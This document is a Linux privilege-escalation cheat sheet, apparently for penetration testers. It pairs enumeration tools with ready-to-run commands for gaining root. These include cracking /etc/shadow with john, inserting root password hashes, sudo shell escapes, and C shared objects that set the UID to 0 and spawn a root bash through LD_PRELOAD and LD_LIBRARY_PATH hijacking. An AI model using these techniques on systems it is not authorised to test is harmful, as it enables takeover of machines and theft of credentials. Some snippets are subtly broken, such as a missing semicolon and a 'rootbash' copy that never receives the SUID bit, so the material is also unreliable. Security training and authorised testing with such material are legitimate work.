*nix Privilege Escalation
Tool References
Linux Exploit Suggester - Provides a list of vulnerabilities based on the provided kernel version.
Linux Smart Enumeration (LSE) - Linux privilege escalation enumeration script that includes three verbosity levels.
LinPEAS - Script that searches for Linux privilege escalation paths.
pspy - Command-line tool designed to snoop on processes and view commands run by other users, cron jobs, etc. as they execute.
GTFOBins - List of Unix binaries that can be used to bypass local security restrictions.
Linux Smart Enumeration (LSE)
#Runs LSE in non-interactive mode. Start with level 0 (default), then do a level 1 (interesting), and lastly a level 2 (show all) scan
./lse -i -l 0
Manual PrivEsc Enumeration & Exploitation
Kernel Exploit Enumeration
#Enumerate *nix version information
uname -a
#Find potential exploits
./linux-exploit-suggester-2.pl -k <kernel_version>
"rootbash" SUID
#Check if /bin/bash is owned by root and has SUID bit set
ls -l /bin/bash
#Create a copy of /bin/bash
cp /bin/bash /tmp/rootbash
#Spawn a root shell by executing 'rootbash' with -p
rootbash -p
SUID and SGID Bit Set Files
#Find files with SUID and SGID bits set
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Weak File Permissions
PASSWD and SHADOW
#Check file permissions on /etc/passwd and /etc/shadow
ls -al /etc/
#/etc/passwd - If modifiable or able to append:
##Depending on *nix version, the "x" placeholder (which defers the hash to /etc/shadow) can be replaced with a password hash
openssl passwd "<password>"
root:x:0:0:root:/root:/bin/bash
##Add a new user with ID 0 (root)
#/etc/shadow - If readable, attempt to crack the hashes
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --wordlist=<path_to_wordlist> unshadowed.txt
#/etc/shadow - If modifiable, can replace the password hash
mkpasswd -m sha-512 <new_password_value>
SUDO Direct Escalation
#Check if we can escalate privileges directly to root:
##Switch to root
sudo su
##Run the shell specified by the SHELL environment variable
sudo -s
##Run the login shell specified by the user's password database entry:
sudo -i
##Launch Bash via root
sudo /bin/bash
##Change root password
sudo passwd
#List programs the user is allowed and disallowed to run via sudo, and whether they run as root:
sudo -l
#Check for shell escapes and other vulnerabilities against GTFOBins
sudo <service>
Environment Variables & LD_PRELOAD
#List programs a user is allowed and disallowed to run, and that run under root
#Check if env_keep option includes the LD_PRELOAD environment variable
sudo -l
#If it is, compile the code below, which should spawn a shell
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
/* Initializer the dynamic loader runs when this object is loaded through
 * LD_PRELOAD (the gcc line above passes -nostartfiles, which presumably lets
 * this user-defined _init stand in for the default one).
 * Defender note: sudo's default env_reset drops LD_PRELOAD; this path only
 * exists when sudoers env_keep preserves it, which is what the `sudo -l`
 * check above looks for. */
void _init() {
/* Drop LD_PRELOAD from the environment, presumably so the spawned shell does
 * not load this object again. */
unsetenv("LD_PRELOAD");
/* Set real, effective and saved UIDs to 0 (root). */
setresuid(0,0,0);
/* Spawn bash; -p keeps the elevated effective UID instead of dropping it. */
system("/bin/bash -p");
}
#Run any allowed program using sudo while setting the LD_PRELOAD variable to the shared object we created
sudo LD_PRELOAD=/tmp/preload.so find
Environment Variables & LD_LIBRARY_PATH
#List programs a user is allowed and disallowed to run, and that run under root
#Check if the LD_LIBRARY_PATH environment variable is preserved
sudo -l
#Run the ldd command against the programs listed above
ldd <service_path>
#Check permissions of shared objects listed above.
ls -l <file_path>
#If the object is writable, compile the code below, name it after the shared object being replaced, and replace that object
gcc -o <shared_object_name_replacing> -shared -fPIC <name_of_c_file>
#include <stdio.h>
#include <stdlib.h>
/* Constructor attribute: the loader runs hijack() as soon as this object is
 * mapped, before the host program's main. */
static void hijack() __attribute__((constructor));
/* Runs when the replaced shared object is loaded by the sudo-run program.
 * Defender note: sudo's default env_reset drops LD_LIBRARY_PATH, and this
 * only works if an unprivileged user can write to a library the target
 * program loads -- the `ls -l` permission check above is the same check a
 * hardening review performs. */
void hijack()
{
/* Remove LD_LIBRARY_PATH, presumably so the spawned shell resolves its
 * libraries normally. */
unsetenv("LD_LIBRARY_PATH")
/* Set real, effective and saved UIDs to 0 (root). */
setresuid(0,0,0);
/* Spawn bash with -p so it keeps the elevated effective UID. */
system("/bin/bash -p");
}
#Run the service chosen, setting the LD_LIBRARY_PATH to the directory of our compiled code
sudo LD_LIBRARY_PATH=. <service_name>
SUID & SGID Files
#Find files with the SUID and SGID bits set that run with elevated privileges
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null